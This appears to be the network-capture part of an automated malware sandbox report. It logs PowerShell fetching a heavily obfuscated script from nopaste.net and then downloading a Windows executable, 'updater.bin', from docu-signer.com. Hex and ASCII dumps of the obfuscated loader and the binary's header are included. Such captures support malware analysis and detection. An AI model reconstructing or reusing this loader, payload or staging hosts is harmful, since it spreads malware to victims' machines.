A32A2cX38O33F36F2ce38R32Y33M2cU38O33s37D2cx38X33C37x2cl38u32V33F2cW38B32p35i2cA38c32P30g2cm38x31e39a2cU38W32H34X2cK38P31y39H2cl38k33c35Q2cq38q32C30H2cu38o33k34o2cY38u32d36W2cZ38W32F32C2cB38s32Z34X2cj38S32i35a2cP38e31n39W2cv38O32U32m2cY38Z33s37J2cZ38I33m37
2024-12-17 07:10:08 UTC	1369	IN	Data Raw: 33 32 76 32 63 4f 33 38 69 33 33 4b 33 38 4d 32 63 42 33 38 4c 33 31 6d 33 38 44 32 63 67 33 38 59 33 33 45 33 35 50 32 63 57 33 38 64 33 32 64 33 36 77 32 63 58 33 38 48 33 31 74 33 39 73 32 63 48 33 38 6c 33 31 52 33 38 51 32 63 62 33 38 4f 33 32 4e 33 32 6a 32 63 48 33 38 62 33 31 4e 33 39 5a 32 63 6d 33 38 5a 33 32 66 33 33 5a 32 63 6d 33 38 4e 33 32 55 33 30 5a 32 63 6b 33 38 47 33 32 74 33 35 6b 32 63 68 33 38 53 33 32 77 33 34 46 32 63 68 33 38 47 33 33 4f 33 34 42 32 63 48 33 38 66 33 33 6e 33 35 64 32 63 51 33 38 74 33 31 6c 33 38 6d 32 63 79 33 38 43 33 33 77 33 36 46 32 63 4c 33 38 66 33 33 63 33 36 78 32 63 78 33 38 45 33 33 4b 33 39 4a 32 63 6d 33 38 54 33 32 48 33 35 41 32 63 72 33 38 68 33 32 6a 33 31 49 32 63 53 33 38 48 33 32 43 33 36 42 Data Ascii: 32v2cO38i33K38M2cB38L31m38D2cg38Y33E35P2cW38d32d36w2cX38H31t39s2cH38l31R38Q2cb38O32N32j2cH38b31N39Z2cm38Z32f33Z2cm38N32U30Z2ck38G32t35k2ch38S32w34F2ch38G33O34B2cH38f33n35d2cQ38t31l38m2cy38C33w36F2cL38f33c36x2cx38E33K39J2cm38T32H35A2cr38h32j31I2cS38H32C36B
2024-12-17 07:10:08 UTC	1369	IN	Data Raw: 34 4c 32 63 41 33 38 42 33 31 68 33 39 49 32 63 75 33 38 73 33 32 66 33 32 76 32 63 4d 33 38 6b 33 32 77 33 30 47 32 63 65 33 38 68 33 32 50 33 31 53 32 63 51 33 38 4c 33 33 6b 33 35 46 32 63 4a 33 38 73 33 31 47 33 37 58 32 63 51 33 38 54 33 32 56 33 34 75 32 63 6a 33 38 53 33 32 61 33 36 6d 32 63 76 33 38 71 33 31 61 33 39 7a 32 63 48 33 38 4f 33 32 62 33 36 77 32 63 4a 33 38 6b 33 32 65 33 30 73 32 63 78 33 38 48 33 32 70 33 35 42 32 63 53 33 38 44 33 33 55 33 35 71 32 63 54 33 38 48 33 32 42 33 30 48 32 63 75 33 38 4a 33 32 73 33 35 62 32 63 57 33 38 6c 33 32 4d 33 31 74 32 63 4b 33 38 4b 33 32 4c 33 34 6f 32 63 47 33 38 51 33 32 4b 33 32 43 32 63 6a 33 38 6e 33 33 76 33 34 59 32 63 4f 33 38 4f 33 33 61 33 35 49 32 63 64 33 38 55 33 33 63 33 38 66 32 Data Ascii: 4L2cA38B31h39I2cu38s32f32v2cM38k32w30G2ce38h32P31S2cQ38L33k35F2cJ38s31G37X2cQ38T32V34u2cj38S32a36m2cv38q31a39z2cH38O32b36w2cJ38k32e30s2cx38H32p35B2cS38D33U35q2cT38H32B30H2cu38J32s35b2cW38l32M31t2cK38K32L34o2cG38Q32K32C2cj38n33v34Y2cO38O33a35I2cd38U33c38f2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49711	174.138.125.138	443	7844	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:10:15 UTC	71	OUT	GET /SFHgtxFGtB HTTP/1.1 Host: nopaste.net Connection: Keep-Alive
2024-12-17 07:10:15 UTC	174	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 17 Dec 2024 07:10:15 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close Length: 36495
2024-12-17 07:10:15 UTC	3938	IN	Data Raw: 66 35 62 0d 0a 28 20 20 27 24 24 24 24 24 27 7c 20 20 25 20 20 7b 24 7b 40 3b 7d 3d 2b 20 20 24 28 29 20 20 7d 20 20 7b 20 20 24 7b 5d 5b 7e 7d 3d 20 20 24 7b 40 3b 7d 20 20 7d 20 20 7b 24 7b 5d 24 7d 20 20 3d 2b 2b 24 7b 40 3b 7d 7d 7b 24 7b 2d 29 21 7d 20 20 3d 20 20 28 24 7b 40 3b 7d 20 20 3d 20 20 24 7b 40 3b 7d 20 20 2b 24 7b 5d 24 7d 29 7d 7b 20 20 24 7b 25 2d 5b 7d 3d 20 20 28 24 7b 40 3b 7d 20 20 3d 20 20 24 7b 40 3b 7d 20 20 2b 24 7b 5d 24 7d 29 20 20 7d 20 20 7b 24 7b 20 7d 3d 28 20 20 24 7b 40 3b 7d 3d 24 7b 40 3b 7d 20 20 2b 20 20 24 7b 5d 24 7d 20 20 29 20 20 7d 7b 24 7b 2f 28 7d 20 20 3d 20 20 28 20 20 24 7b 40 3b 7d 20 20 3d 24 7b 40 3b 7d 2b 20 20 24 7b 5d 24 7d 20 20 29 20 20 7d 20 20 7b 24 7b 7e 7d 20 20 3d 20 20 28 20 20 24 7b 40 3b 7d Data Ascii: f5b( '$$$$$'\| % {${@;}=+ $() } { ${][~}= ${@;} } {${]$} =++${@;}}{${-)!} = (${@;} = ${@;} +${]$})}{ ${%-[}= (${@;} = ${@;} +${]$}) } {${ }=( ${@;}=${@;} + ${]$} ) }{${/(} = ( ${@;} =${@;}+ ${]$} ) } {${~} = ( ${@;}
2024-12-17 07:10:15 UTC	4104	IN	Data Raw: 31 30 30 30 0d 0a 7b 5d 5b 7e 7d 20 20 2b 24 7b 28 25 29 7d 24 7b 5d 24 7d 24 7b 2d 29 21 7d 24 7b 5d 24 7d 2b 24 7b 28 25 29 7d 24 7b 5d 24 7d 24 7b 2d 29 21 7d 24 7b 2d 29 21 7d 20 20 2b 20 20 24 7b 28 25 29 7d 24 7b 25 2d 5b 7d 24 7b 20 7d 20 20 2b 20 20 24 7b 28 25 29 7d 24 7b 5d 24 7d 24 7b 25 2d 5b 7d 2b 24 7b 28 25 29 7d 24 7b 5d 24 7d 24 7b 5d 5b 7e 7d 20 20 2b 20 20 24 7b 28 25 29 7d 24 7b 25 2d 5b 7d 24 7b 2d 29 21 7d 2b 24 7b 28 25 29 7d 24 7b 25 2d 5b 7d 24 7b 2d 29 21 7d 20 20 2b 24 7b 28 25 29 7d 24 7b 25 2d 5b 7d 24 7b 2d 29 21 7d 2b 20 20 24 7b 28 25 29 7d 24 7b 25 2d 5b 7d 24 7b 2d 29 21 7d 2b 24 7b 28 25 29 7d 24 7b 20 7d 24 7b 5d 24 7d 20 20 2b 24 7b 28 25 29 7d 24 7b 5d 24 7d 24 7b 25 2d 5b 7d 20 20 2b 20 20 24 7b 28 25 29 7d 24 7b 5d Data Ascii: 1000{][~} +${(%)}${]$}${-)!}${]$}+${(%)}${]$}${-)!}${-)!} + ${(%)}${%-[}${ } + ${(%)}${]$}${%-[}+${(%)}${]$}${][~} + ${(%)}${%-[}${-)!}+${(%)}${%-[}${-)!} +${(%)}${%-[}${-)!}+ ${(%)}${%-[}${-)!}+${(%)}${ }${]$} +${(%)}${]$}${%-[} + ${(%)}${]
2024-12-17 07:10:15 UTC	4104	IN	Data Raw: 31 30 30 30 0d 0a 7b 28 25 29 7d 24 7b 5d 24 7d 24 7b 5d 24 7d 24 7b 2f 28 7d 20 20 2b 24 7b 28 25 29 7d 24 7b 5d 24 7d 24 7b 5d 24 7d 24 7b 7e 7d 2b 24 7b 28 25 29 7d 24 7b 5d 24 7d 24 7b 5d 24 7d 24 7b 20 7d 2b 20 20 24 7b 28 25 29 7d 24 7b 5d 24 7d 24 7b 5d 5b 7e 7d 24 7b 2f 28 7d 2b 24 7b 28 25 29 7d 24 7b 5d 24 7d 24 7b 5d 24 7d 24 7b 5d 5b 7e 7d 2b 24 7b 28 25 29 7d 24 7b 5d 24 7d 24 7b 5d 5b 7e 7d 24 7b 25 2d 5b 7d 2b 24 7b 28 25 29 7d 24 7b 5b 7d 24 7b 25 2d 5b 7d 20 20 2b 24 7b 28 25 29 7d 24 7b 25 2d 5b 7d 24 7b 7e 7d 20 20 2b 20 20 24 7b 28 25 29 7d 24 7b 7e 7d 24 7b 3d 3b 7d 20 20 2b 24 7b 28 25 29 7d 24 7b 5d 24 7d 24 7b 5d 5b 7e 7d 24 7b 20 7d 20 20 2b 24 7b 28 25 29 7d 24 7b 5b 7d 24 7b 3d 3b 7d 20 20 2b 24 7b 28 25 29 7d 24 7b 5d 24 7d 24 Data Ascii: 1000{(%)}${]$}${]$}${/(} +${(%)}${]$}${]$}${~}+${(%)}${]$}${]$}${ }+ ${(%)}${]$}${][~}${/(}+${(%)}${]$}${]$}${][~}+${(%)}${]$}${][~}${%-[}+${(%)}${[}${%-[} +${(%)}${%-[}${~} + ${(%)}${~}${=;} +${(%)}${]$}${][~}${ } +${(%)}${[}${=;} +${(%)}${]$}$
2024-12-17 07:10:15 UTC	4104	IN	Data Raw: 31 30 30 30 0d 0a 7d 24 7b 5d 5b 7e 7d 20 20 2b 20 20 24 7b 28 25 29 7d 24 7b 25 2d 5b 7d 24 7b 7e 7d 20 20 2b 24 7b 28 25 29 7d 24 7b 5d 24 7d 24 7b 5d 5b 7e 7d 24 7b 2d 29 21 7d 20 20 2b 24 7b 28 25 29 7d 24 7b 2f 28 7d 24 7b 5d 5b 7e 7d 2b 24 7b 28 25 29 7d 24 7b 25 2d 5b 7d 24 7b 2d 29 21 7d 2b 24 7b 28 25 29 7d 24 7b 7e 7d 24 7b 5d 24 7d 2b 20 20 24 7b 28 25 29 7d 24 7b 25 2d 5b 7d 24 7b 2d 29 21 7d 20 20 2b 24 7b 28 25 29 7d 24 7b 25 2d 5b 7d 24 7b 20 7d 2b 20 20 24 7b 28 25 29 7d 24 7b 5d 24 7d 24 7b 5d 5b 7e 7d 24 7b 20 7d 2b 24 7b 28 25 29 7d 24 7b 5d 24 7d 24 7b 5d 24 7d 24 7b 7e 7d 20 20 2b 20 20 24 7b 28 25 29 7d 24 7b 5d 24 7d 24 7b 5d 24 7d 24 7b 7e 7d 20 20 2b 24 7b 28 25 29 7d 24 7b 5d 24 7d 24 7b 5d 24 7d 24 7b 2d 29 21 7d 20 20 2b 24 7b Data Ascii: 1000}${][~} + ${(%)}${%-[}${~} +${(%)}${]$}${][~}${-)!} +${(%)}${/(}${][~}+${(%)}${%-[}${-)!}+${(%)}${~}${]$}+ ${(%)}${%-[}${-)!} +${(%)}${%-[}${ }+ ${(%)}${]$}${][~}${ }+${(%)}${]$}${]$}${~} + ${(%)}${]$}${]$}${~} +${(%)}${]$}${]$}${-)!} +${
2024-12-17 07:10:15 UTC	4104	IN	Data Raw: 31 30 30 30 0d 0a 28 25 29 7d 24 7b 5d 24 7d 24 7b 5d 5b 7e 7d 24 7b 20 7d 2b 24 7b 28 25 29 7d 24 7b 25 2d 5b 7d 24 7b 2d 29 21 7d 2b 24 7b 28 25 29 7d 24 7b 2f 28 7d 24 7b 7e 7d 2b 24 7b 28 25 29 7d 24 7b 5d 24 7d 24 7b 25 2d 5b 7d 20 20 2b 20 20 24 7b 28 25 29 7d 24 7b 5d 24 7d 24 7b 5d 5b 7e 7d 2b 20 20 24 7b 28 25 29 7d 24 7b 25 2d 5b 7d 24 7b 7e 7d 20 20 2b 20 20 24 7b 28 25 29 7d 24 7b 5d 24 7d 24 7b 5d 24 7d 24 7b 7e 7d 20 20 2b 24 7b 28 25 29 7d 24 7b 5d 24 7d 24 7b 5d 5b 7e 7d 24 7b 5d 24 7d 2b 20 20 24 7b 28 25 29 7d 24 7b 5d 24 7d 24 7b 5d 5b 7e 7d 24 7b 5b 7d 2b 20 20 24 7b 28 25 29 7d 24 7b 5d 24 7d 24 7b 5d 24 7d 24 7b 2d 29 21 7d 2b 24 7b 28 25 29 7d 24 7b 7e 7d 24 7b 29 2b 7d 20 20 2b 20 20 24 7b 28 25 29 7d 24 7b 5d 24 7d 24 7b 5d 5b 7e Data Ascii: 1000(%)}${]$}${][~}${ }+${(%)}${%-[}${-)!}+${(%)}${/(}${~}+${(%)}${]$}${%-[} + ${(%)}${]$}${][~}+ ${(%)}${%-[}${~} + ${(%)}${]$}${]$}${~} +${(%)}${]$}${][~}${]$}+ ${(%)}${]$}${][~}${[}+ ${(%)}${]$}${]$}${-)!}+${(%)}${~}${)+} + ${(%)}${]$}${][~
2024-12-17 07:10:15 UTC	4104	IN	Data Raw: 31 30 30 30 0d 0a 7d 20 20 2b 24 7b 28 25 29 7d 24 7b 5d 24 7d 24 7b 5d 24 7d 24 7b 5d 24 7d 2b 24 7b 28 25 29 7d 24 7b 5d 24 7d 24 7b 5d 5b 7e 7d 24 7b 2f 28 7d 2b 20 20 24 7b 28 25 29 7d 24 7b 5d 24 7d 24 7b 5d 24 7d 24 7b 5d 5b 7e 7d 20 20 2b 24 7b 28 25 29 7d 24 7b 20 7d 24 7b 2f 28 7d 2b 20 20 24 7b 28 25 29 7d 24 7b 29 2b 7d 24 7b 5d 5b 7e 7d 2b 24 7b 28 25 29 7d 24 7b 5b 7d 24 7b 3d 3b 7d 2b 20 20 24 7b 28 25 29 7d 24 7b 5d 24 7d 24 7b 5d 24 7d 24 7b 7e 7d 20 20 2b 24 7b 28 25 29 7d 24 7b 5d 24 7d 24 7b 5d 5b 7e 7d 24 7b 20 7d 2b 24 7b 28 25 29 7d 24 7b 25 2d 5b 7d 24 7b 2d 29 21 7d 2b 20 20 24 7b 28 25 29 7d 24 7b 20 7d 24 7b 2f 28 7d 20 20 2b 24 7b 28 25 29 7d 24 7b 29 2b 7d 24 7b 5d 5b 7e 7d 2b 24 7b 28 25 29 7d 24 7b 5b 7d 24 7b 3d 3b 7d 2b 20 Data Ascii: 1000} +${(%)}${]$}${]$}${]$}+${(%)}${]$}${][~}${/(}+ ${(%)}${]$}${]$}${][~} +${(%)}${ }${/(}+ ${(%)}${)+}${][~}+${(%)}${[}${=;}+ ${(%)}${]$}${]$}${~} +${(%)}${]$}${][~}${ }+${(%)}${%-[}${-)!}+ ${(%)}${ }${/(} +${(%)}${)+}${][~}+${(%)}${[}${=;}+
2024-12-17 07:10:15 UTC	4104	IN	Data Raw: 31 30 30 30 0d 0a 25 29 7d 24 7b 25 2d 5b 7d 24 7b 2d 29 21 7d 20 20 2b 24 7b 28 25 29 7d 24 7b 5b 7d 24 7b 5d 24 7d 2b 24 7b 28 25 29 7d 24 7b 5d 24 7d 24 7b 5d 24 7d 24 7b 2f 28 7d 20 20 2b 20 20 24 7b 28 25 29 7d 24 7b 5d 24 7d 24 7b 5d 24 7d 24 7b 7e 7d 20 20 2b 20 20 24 7b 28 25 29 7d 24 7b 5d 24 7d 24 7b 5d 24 7d 24 7b 20 7d 20 20 2b 24 7b 28 25 29 7d 24 7b 5d 24 7d 24 7b 5d 5b 7e 7d 24 7b 2f 28 7d 20 20 2b 20 20 24 7b 28 25 29 7d 24 7b 5d 24 7d 24 7b 5d 24 7d 24 7b 5d 5b 7e 7d 20 20 2b 20 20 24 7b 28 25 29 7d 24 7b 5d 24 7d 24 7b 5d 5b 7e 7d 24 7b 25 2d 5b 7d 2b 24 7b 28 25 29 7d 24 7b 5b 7d 24 7b 25 2d 5b 7d 2b 20 20 24 7b 28 25 29 7d 24 7b 25 2d 5b 7d 24 7b 7e 7d 20 20 2b 20 20 24 7b 28 25 29 7d 24 7b 29 2b 7d 24 7b 2f 28 7d 20 20 2b 20 20 24 7b Data Ascii: 1000%)}${%-[}${-)!} +${(%)}${[}${]$}+${(%)}${]$}${]$}${/(} + ${(%)}${]$}${]$}${~} + ${(%)}${]$}${]$}${ } +${(%)}${]$}${][~}${/(} + ${(%)}${]$}${]$}${][~} + ${(%)}${]$}${][~}${%-[}+${(%)}${[}${%-[}+ ${(%)}${%-[}${~} + ${(%)}${)+}${/(} + ${
2024-12-17 07:10:15 UTC	4104	IN	Data Raw: 31 30 30 30 0d 0a 24 7b 5d 24 7d 24 7b 5d 24 7d 20 20 2b 20 20 24 7b 28 25 29 7d 24 7b 5d 24 7d 24 7b 5d 24 7d 24 7b 2d 29 21 7d 2b 20 20 24 7b 28 25 29 7d 24 7b 5d 24 7d 24 7b 25 2d 5b 7d 20 20 2b 20 20 24 7b 28 25 29 7d 24 7b 5d 24 7d 24 7b 5d 5b 7e 7d 20 20 2b 24 7b 28 25 29 7d 24 7b 25 2d 5b 7d 24 7b 2d 29 21 7d 20 20 2b 20 20 24 7b 28 25 29 7d 24 7b 25 2d 5b 7d 24 7b 2d 29 21 7d 20 20 2b 24 7b 28 25 29 7d 24 7b 25 2d 5b 7d 24 7b 2d 29 21 7d 2b 20 20 24 7b 28 25 29 7d 24 7b 25 2d 5b 7d 24 7b 2d 29 21 7d 20 20 2b 24 7b 28 25 29 7d 24 7b 5d 24 7d 24 7b 2d 29 21 7d 24 7b 2f 28 7d 20 20 2b 24 7b 28 25 29 7d 24 7b 25 2d 5b 7d 24 7b 2d 29 21 7d 2b 24 7b 28 25 29 7d 24 7b 5b 7d 24 7b 5b 7d 2b 24 7b 28 25 29 7d 24 7b 5b 7d 24 7b 3d 3b 7d 20 20 2b 20 20 24 7b Data Ascii: 1000${]$}${]$} + ${(%)}${]$}${]$}${-)!}+ ${(%)}${]$}${%-[} + ${(%)}${]$}${][~} +${(%)}${%-[}${-)!} + ${(%)}${%-[}${-)!} +${(%)}${%-[}${-)!}+ ${(%)}${%-[}${-)!} +${(%)}${]$}${-)!}${/(} +${(%)}${%-[}${-)!}+${(%)}${[}${[}+${(%)}${[}${=;} + ${
2024-12-17 07:10:16 UTC	3899	IN	Data Raw: 66 33 34 0d 0a 2f 28 7d 20 20 2b 20 20 24 7b 28 25 29 7d 24 7b 5d 24 7d 24 7b 25 2d 5b 7d 2b 20 20 24 7b 28 25 29 7d 24 7b 5d 24 7d 24 7b 5d 5b 7e 7d 20 20 2b 20 20 24 7b 28 25 29 7d 24 7b 5d 24 7d 24 7b 25 2d 5b 7d 2b 24 7b 28 25 29 7d 24 7b 5d 24 7d 24 7b 5d 5b 7e 7d 2b 20 20 24 7b 28 25 29 7d 24 7b 5d 24 7d 24 7b 5d 5b 7e 7d 24 7b 2f 28 7d 2b 24 7b 28 25 29 7d 24 7b 5d 24 7d 24 7b 5d 5b 7e 7d 24 7b 2d 29 21 7d 2b 24 7b 28 25 29 7d 24 7b 25 2d 5b 7d 24 7b 2d 29 21 7d 20 20 2b 24 7b 28 25 29 7d 24 7b 20 7d 24 7b 5d 5b 7e 7d 20 20 2b 20 20 24 7b 28 25 29 7d 24 7b 20 7d 24 7b 2f 28 7d 2b 24 7b 28 25 29 7d 24 7b 5d 24 7d 24 7b 5d 24 7d 24 7b 5d 5b 7e 7d 2b 24 7b 28 25 29 7d 24 7b 5d 24 7d 24 7b 5d 24 7d 24 7b 5d 24 7d 20 20 2b 20 20 24 7b 28 25 29 7d 24 7b Data Ascii: f34/(} + ${(%)}${]$}${%-[}+ ${(%)}${]$}${][~} + ${(%)}${]$}${%-[}+${(%)}${]$}${][~}+ ${(%)}${]$}${][~}${/(}+${(%)}${]$}${][~}${-)!}+${(%)}${%-[}${-)!} +${(%)}${ }${][~} + ${(%)}${ }${/(}+${(%)}${]$}${]$}${][~}+${(%)}${]$}${]$}${]$} + ${(%)}${
2024-12-17 07:10:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49732	104.21.87.65	443	7844	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:10:22 UTC	189	OUT	GET /api/uz/0912545164/updater.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: docu-signer.com Connection: Keep-Alive
2024-12-17 07:10:23 UTC	871	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 07:10:22 GMT Content-Type: application/octet-stream Content-Length: 893608 Connection: close Last-Modified: Sun, 13 Oct 2024 09:57:05 GMT ETag: "670b9971-da2a8" Accept-Ranges: bytes cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VJ4r8Km0%2BngFoJAh5oFVj8mYNrJsiIKuaWAeI798vXDhhwJQGBdvpMpdHON8Xm28sYYbcpJEjy06EXXgjCjQ1LN64ANBIZOSFY73AKaX9N8uEX8txe12VIUmjkTk6R38SHA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3517cf6e9d8c15-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1968&min_rtt=1962&rtt_var=748&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=803&delivery_rate=1449851&cwnd=238&unsent_bytes=0&cid=2ece10de9a69444b&ts=684&x=0"
2024-12-17 07:10:23 UTC	498	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 16 73 44 90 52 12 2a c3 52 12 2a c3 52 12 2a c3 14 43 cb c3 50 12 2a c3 cc b2 ed c3 53 12 2a c3 5f 40 f5 c3 61 12 2a c3 5f 40 ca c3 e3 12 2a c3 5f 40 cb c3 67 12 2a c3 5b 6a a9 c3 5b 12 2a c3 5b 6a b9 c3 77 12 2a c3 52 12 2b c3 72 10 2a c3 e7 8c c0 c3 02 12 2a c3 e7 8c f5 c3 53 12 2a c3 5f 40 f1 c3 53 12 2a c3 52 12 bd c3 50 12 2a c3 e7 8c f4 c3 53 12 2a c3 52 69 63 68 52 12 2a Data Ascii: MZ@!L!This program cannot be run in DOS mode.$sDRRRCPS_@a_@_@g[j[[jwR+r*S_@SRPSRichR
2024-12-17 07:10:23 UTC	1369	IN	Data Raw: 09 00 84 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b1 e7 08 00 00 10 00 00 00 e8 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 8e fd 02 00 00 00 09 00 00 fe 02 00 00 ec 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 8f 00 00 00 00 0c 00 00 52 00 00 00 ea 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 d7 00 00 00 90 0c 00 00 d8 00 00 00 3c 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 71 00 00 00 70 0d 00 00 72 00 00 00 14 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: .text `.rdata@@.datatR@.rsrcP<@@.relocqpr@B
2024-12-17 07:10:23 UTC	1369	IN	Data Raw: 97 fc 01 00 8b d0 59 85 d2 74 1d 8b 4d 08 8b 09 89 0a 8b 4e 08 8b 46 04 89 14 88 ff 46 08 5e 5b 5d c2 04 00 8b c1 eb b0 33 d2 eb e6 56 8b f1 ff 4e 08 8b 56 08 8b 46 04 ff 34 90 e8 d1 fc 01 00 8b 46 04 59 8b 4e 08 5e 83 24 88 00 c3 56 8b f1 57 33 ff 39 7e 08 0f 87 a7 a4 03 00 83 66 08 00 5f 5e c3 56 8b f1 c7 06 68 09 49 00 e8 dc ff ff ff ff 76 04 e8 98 fc 01 00 59 5e c3 56 ff 15 34 07 49 00 be b0 77 4c 00 50 8b ce e8 07 16 00 00 83 f8 ff 74 14 8b 15 10 78 4c 00 8b ce 6a 02 8b 04 82 ff 30 e8 20 13 00 00 5e c2 10 00 55 8b ec 53 56 8b f1 6a 04 5b 8b 46 0c 39 46 08 74 26 53 e8 d6 fb 01 00 8b d0 59 85 d2 74 4f 8b 4d 08 8b 09 89 0a 8b 4e 08 8b 46 04 89 14 88 ff 46 08 5e 5b 5d c2 04 00 8d 0c 00 6a 08 58 3b c8 73 28 33 c9 89 46 0c f7 e3 57 0f 90 c1 f7 d9 0b c8 51 Data Ascii: YtMNFF^[]3VNVF4FYN^$VW39~f_^VhIvY^V4IwLPtxLj0 ^USVj[F9Ft&SYtOMNFF^[]jX;s(3FWQ
2024-12-17 07:10:23 UTC	1369	IN	Data Raw: 53 0c 7c a5 8b 5b 04 8b 45 ec 8b 4d f0 85 db 0f 85 70 ff ff ff 57 56 e8 cc fe ff ff 8a 45 ff 5f 5e 5b 8b e5 5d c2 08 00 83 7d f0 ff 8b 7d f8 74 07 57 56 e8 b0 fe ff ff 8b 45 0c 83 38 ff 74 21 8b 00 89 45 f0 8b 4d 08 83 39 ff 74 05 8b 39 89 7d f8 ff 75 ec 6a 00 57 50 56 e8 cc fd ff ff eb 86 8b 45 f0 eb df 55 8b ec 83 ec 10 83 65 f8 00 53 56 57 8b 7d 08 33 db 43 c7 45 fc fe ff ff ff 57 89 5d f0 ff 15 28 01 49 00 8b 75 0c 88 1d 6c 78 4c 00 eb 6f ff 75 f0 33 db 53 ff 75 fc ff 75 f8 57 e8 84 fd ff ff 39 5e 0c 7e 34 8b ce 8d 86 10 08 00 00 8d 56 10 89 45 f4 f7 d9 89 55 0c 89 4d 08 80 38 08 73 53 83 c2 08 40 89 45 f4 05 f0 f7 ff ff 03 c1 89 55 0c 3b 46 0c 8b 45 f4 7c e2 8b 46 0c 3b d8 74 1a 2b c3 50 8d 86 10 08 00 00 03 c3 50 8d 43 02 8d 04 c6 50 57 ff 15 24 01 Data Ascii: S\|[EMpWVE_^[]}}tWVE8t!EM9t9}ujWPVEUeSVW}3CEW](IulxLou3SuuW9^~4VEUM8sS@EU;FE\|F;t+PPCPW$
2024-12-17 07:10:23 UTC	1369	IN	Data Raw: 08 01 00 00 4a 0f 84 fa 00 00 00 4a 0f 84 00 9f 03 00 4a 75 c0 56 b9 b0 77 4c 00 e8 c5 0b 00 00 8b 0d 10 78 4c 00 6a 0f 8b 04 81 8b 30 ff 15 28 05 49 00 83 7e 4c ff 8b f8 74 03 8b 7e 4c 57 53 ff 15 40 01 49 00 6a 00 57 e8 55 08 00 00 eb 8f 8b c8 83 e9 4e 0f 84 aa 9e 03 00 83 e9 05 0f 84 90 9e 03 00 83 e9 28 0f 84 71 9e 03 00 83 e9 09 0f 84 52 9e 03 00 81 e9 8d 00 00 00 0f 84 30 9e 03 00 49 0f 84 12 9e 03 00 49 49 0f 85 44 ff ff ff 6a 01 e9 ec 9d 03 00 83 fa 01 0f 84 55 fe ff ff ff 75 14 ff 75 10 52 e9 2b ff ff ff 74 23 8b c8 49 0f 84 34 ff ff ff 49 75 2d 56 e8 d3 fb ff ff e9 26 ff ff ff 53 56 e8 8f fb ff ff e9 1a ff ff ff 8b c3 c1 e8 10 50 57 0f b7 c3 50 56 e8 97 fd ff ff e9 04 ff ff ff 49 74 0d 49 49 0f 85 e2 fe ff ff e9 68 9d 03 00 51 51 56 e8 43 b1 08 Data Ascii: JJJuVwLxLj0(I~Lt~LWS@IjWUN(qR0IIIDjUuuR+t#I4Iu-V&SVPWPVItIIhQQVC
2024-12-17 07:10:23 UTC	1369	IN	Data Raw: 83 cb ff 39 5e 58 74 3d 39 5e 5c 74 45 8d 45 dc 50 ff 37 ff 15 94 06 49 00 39 5e 60 0f 84 a6 9a 03 00 39 5e 64 0f 84 af 9a 03 00 80 bf 90 00 00 00 00 0f 85 7b ff ff ff e9 9d 9a 03 00 80 7d 10 00 74 b1 eb 99 66 8b 45 dc 66 89 87 88 00 00 00 eb b6 66 8b 45 e0 66 89 87 8a 00 00 00 eb ae 55 8b ec a1 b4 77 4c 00 8b 4d 18 83 f8 01 0f 85 d6 9b 03 00 8b 45 08 83 f8 ff 74 03 89 41 58 8b 45 0c 83 f8 ff 74 03 89 41 5c 8b 45 10 85 c0 7e 03 89 41 60 8b 45 14 85 c0 7e 03 89 41 64 5d c2 14 00 55 8b ec 51 a1 10 78 4c 00 56 8b 75 08 57 6a 00 8b 04 b0 8b 38 57 e8 0b fb ff ff 83 7f 18 00 0f 85 c8 9b 03 00 8b 0d 34 78 4c 00 6a 03 5a 89 55 fc 3b ca 0f 8c ad 00 00 00 a1 24 78 4c 00 8b 04 90 8b 30 85 f6 0f 84 8c 00 00 00 8b 46 04 3b 47 04 0f 85 80 00 00 00 0f b6 86 90 00 00 00 Data Ascii: 9^Xt=9^\tEEP7I9^`9^d{}tfEffEfUwLMEtAXEtA\E~A`E~Ad]UQxLVuWj8W4xLjZU;$xL0F;G
